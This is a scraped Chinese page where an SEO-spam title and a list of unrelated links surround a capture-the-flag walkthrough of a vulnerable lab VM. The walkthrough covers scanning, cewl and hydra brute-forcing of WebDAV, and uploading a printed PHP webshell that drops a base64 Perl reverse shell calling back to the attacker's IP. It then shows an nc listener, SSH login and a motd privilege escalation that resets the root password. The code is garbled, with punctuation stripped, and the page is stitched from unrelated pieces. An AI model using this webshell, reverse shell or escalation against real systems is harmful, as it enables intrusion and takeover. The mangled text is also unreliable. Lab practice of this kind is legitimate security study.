当前位置: 首页 > news >正文

搜h网站技巧网络营销课程免费

搜h网站技巧,网络营销课程免费,公司网页怎么设计,优秀校园景观设计靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址#xff0c;寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描#xff0c;dirb目录扫描工具#xff08;kali自带的#xff…靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描dirb目录扫描工具kali自带的使用命令dirb   http//192.168.101.102,扫描后发现有3个网址发现有webdav网址 二、利用webdav客户端思路cadaver http://192.168.101.102/webdav——连接Put webshell.php——上传木马 使用cewl——爬行网站创建密码字典使用方法 cewl 192.168.101.102 -w 1.txt 使用hydra自动化爆破工具使用方法 hydra -L 1.txt -P 1.txt 192.168.101.102 http-get /webdav 用爆破的用户密码成功登录 上传一个webshell.php文件 Webshell.php文件源码如下 ?php function which($pr) { $path execute(which $pr); return ($path ? $path : $pr); } function execute($cfe) { $res ; if ($cfe) { if(function_exists(exec)) { exec($cfe,$res); $res join(\n,$res); } elseif(function_exists(shell_exec)) { $res shell_exec($cfe); } elseif(function_exists(system)) { ob_start(); system($cfe); $res ob_get_contents(); ob_end_clean(); } elseif(function_exists(passthru)) { ob_start(); passthru($cfe); $res ob_get_contents(); ob_end_clean(); } elseif(is_resource($f popen($cfe,r))) { $res ; while(!feof($f)) { $res . fread($f,1024); } pclose($f); } } return $res; } function cf($fname,$text){ if($fpfopen($fname,w)) { fputs($fp,base64_decode($text)); fclose($fp); } } $yourip 192.168.101.102; 注意这里是kali的ip $yourport 4444; $usedb array(perlperl,cc); $back_connectIyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw; cf(/tmp/.bc,$back_connect); $res execute(which(perl). /tmp/.bc $yourip $yourport ); ? 使用put webshell.php上传注意webshell路径 上传成功之后需要访问192.168.101.102建立反向连接访问网站之前开启监听监听命方法如下nc -lvvp 4444 使用之前爆破的用户密码登录接着查看监听情况 看到如下情况说明成功回弹websshell 优化命令执行终端执行下面命令进入python交互式(注意要下载python环境才能运行): python3 -c  ‘import pty;pty.spawn(“/bin/bash”)’ 查看当前用户使用命令 cd /home 、ls(发现3个用户) 在mnt目录下面发现了hell.sh文件发现brainfuck to text编码进行解码得到chitragupt猜测是密码 解码网站https://www.splitbrain.org/services/ook 使用命令ssh进行连接具体方法ssh inferno192.168.101.102 查看该用户的文件发现有个user.txt,查看该文件发现一个flag 三、Motd提权 具体步骤1.进入到文件夹/etc/update-mode.d/ 2修改文件 echo echo root:admin|sudo chpasswd00-header 3.重新登录4.su root root:toor| sudo chpasswd 拿到root权限后查看有什么文件有发现一个txt文件查看发现有flag
http://www.zqtcl.cn/news/528857/

相关文章:

  • 网站运营优化建议英国网站域名
  • 网站开发洲际企业网站模板论坛
  • 如何建外贸网站软件工程专业是干什么的
  • 衣联网和一起做网站 哪家强网站seo方案建设目标
  • 深圳企业股权优化网站程序代码优化
  • 中国石油大学网页设计与网站建设软件界面设计要求
  • 看网站有没有做404报名网站建设
  • 有哪些是做二手的网站关于网站制作的指标
  • 网站数据库是谁提供空间坐标系做图网站
  • 网站开发的外文文献佛山做网站格
  • 石家庄网站seo服务免费10大看盘软件
  • 自己做网站卖什么给个网站好人有好报2020免费
  • 网站源码安装步骤网站开发用c 语言
  • 网站首页是什么产品网络推广方案
  • 网站首页制作方案南通市规划建设局网站
  • 网站建设费用兴田德润团队西宁网站策划公司
  • 手机价格网站建设用别人备案域名做违法网站
  • 成都武侯区建设厅官方网站石家庄住房和城乡建设部网站
  • 前端做网站的步骤酉阳网站建设
  • 湖北省住房与建设厅网站php做网站访问记录
  • 做网站的公司没有技术吉林北京网站建设
  • 产品设计培训机构哪家好贵州整站优化seo平台
  • 天津网站制作推广wordpress 果酱
  • 写给初学网站开发们的一封信企业网站建设 ppt
  • 做装修网站多少钱做网站百度一下
  • 用asp做网站的可行性分析9免费建网站
  • 网站域名注册商查询徐州集团网站建设报价
  • 句容网站设计公司做网站充值犯法吗
  • 网站建设所用系统网站备案目的
  • 苏州做网站优化公司哪家好网站的大小